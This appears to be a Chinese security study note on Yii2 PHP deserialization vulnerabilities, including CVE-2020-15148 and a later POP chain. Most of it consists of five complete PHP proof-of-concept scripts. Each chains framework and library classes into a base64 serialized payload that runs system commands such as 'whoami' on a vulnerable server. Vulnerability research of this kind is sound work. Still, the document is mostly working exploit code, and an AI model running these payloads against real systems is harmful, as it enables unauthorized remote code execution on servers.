yii学习
yii2
CVE-2020-15148
影响yii2的2.0.37版本或其他更低版本
poc1-3 可看此文章https://juejin.cn/post/6874149010832097294
poc1(CVE-2020-15148)
利用[(new test), "aaa"]
来调用任意test类的aaa方法,绕过了call_user_func参数不可控。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40
| <?php namespace yii\rest{ class CreateAction{ public $checkAccess; public $id;
public function __construct(){ $this->checkAccess = 'system'; $this->id = 'ls'; } } }
namespace Faker{ use yii\rest\CreateAction;
class Generator{ protected $formatters;
public function __construct(){ $this->formatters['close'] = [new CreateAction(), 'run']; } } }
namespace yii\db{ use Faker\Generator;
class BatchQueryResult{ private $_dataReader;
public function __construct(){ $this->_dataReader = new Generator; } } } namespace{ echo base64_encode(serialize(new yii\db\BatchQueryResult)); } ?>
|
poc2
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42
| <?php namespace yii\rest{ class CreateAction{ public $checkAccess; public $id;
public function __construct(){ $this->checkAccess = 'system'; $this->id = 'ls'; } } }
namespace Faker{ use yii\rest\CreateAction;
class Generator{ protected $formatters;
public function __construct(){ $this->formatters['isRunning'] = [new CreateAction(), 'run']; } } }
namespace Codeception\Extension{ use Faker\Generator; class RunProcess{ private $processes; public function __construct() { $this->processes = [new Generator()]; } } } namespace{ // 生成poc echo base64_encode(serialize(new Codeception\Extension\RunProcess())); } ?>
|
poc3
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55
| <?php namespace yii\rest{ class CreateAction{ public $checkAccess; public $id;
public function __construct(){ $this->checkAccess = 'system'; $this->id = 'ls'; } } }
namespace Faker{ use yii\rest\CreateAction;
class Generator{ protected $formatters;
public function __construct(){ $this->formatters['render'] = [new CreateAction(), 'run']; } } }
namespace phpDocumentor\Reflection\DocBlock\Tags{
use Faker\Generator;
class See{ protected $description; public function __construct() { $this->description = new Generator(); } } } namespace{ use phpDocumentor\Reflection\DocBlock\Tags\See; class Swift_KeyCache_DiskKeyCache{ private $keys = []; private $path; public function __construct() { $this->path = new See; $this->keys = array( "axin"=>array("is"=>"handsome") ); } } echo base64_encode(serialize(new Swift_KeyCache_DiskKeyCache())); } ?>
|
poc4
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43
| <?php namespace yii\rest{ class IndexAction { public $checkAccess; public $id; public function __construct() { $this->checkAccess="system"; $this->id="whoami";
} } } namespace yii\web{ use yii\rest\IndexAction;
class DbSession { protected $fields = []; public $writeCallback; public function __construct() { $this->writeCallback=[(new IndexAction),"run"]; $this->fields['1'] = 'aaa'; }
} } namespace yii\db { use yii\web\DbSession;
class BatchQueryResult { private $_dataReader; public function __construct() { $this->_dataReader=new DbSession(); } } } namespace { $exp=print(base64_encode(serialize(new yii\db\BatchQueryResult()))); } ?>
|
other poc
可看此文章
https://www.anquanke.com/post/id/217929
新POP链
yii2 version <= 2.0.41(GitHub最新版本)
https://xz.aliyun.com/t/9420
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41
| <?php namespace Faker{
class DefaultGenerator{ protected $default ; function __construct($argv) { $this->default = $argv; } }
class ValidGenerator{ protected $generator; protected $validator; protected $maxRetries; function __construct($command,$argv) { $this->generator = new DefaultGenerator($argv); $this->validator = $command; $this->maxRetries = 99999999; } } }
namespace Codeception\Extension{ use Faker\ValidGenerator; class RunProcess{ private $processes = [] ; function __construct($command,$argv) { $this->processes[] = new ValidGenerator($command,$argv); } } }
namespace { use Codeception\Extension\RunProcess; $exp = new RunProcess('system','whoami'); echo(base64_encode(serialize($exp))); exit(); }
|
YII2SQL注入分析
影响版本: 小于v 2.0.15
https://juejin.cn/post/6874149010832097294
https://www.anquanke.com/post/id/217929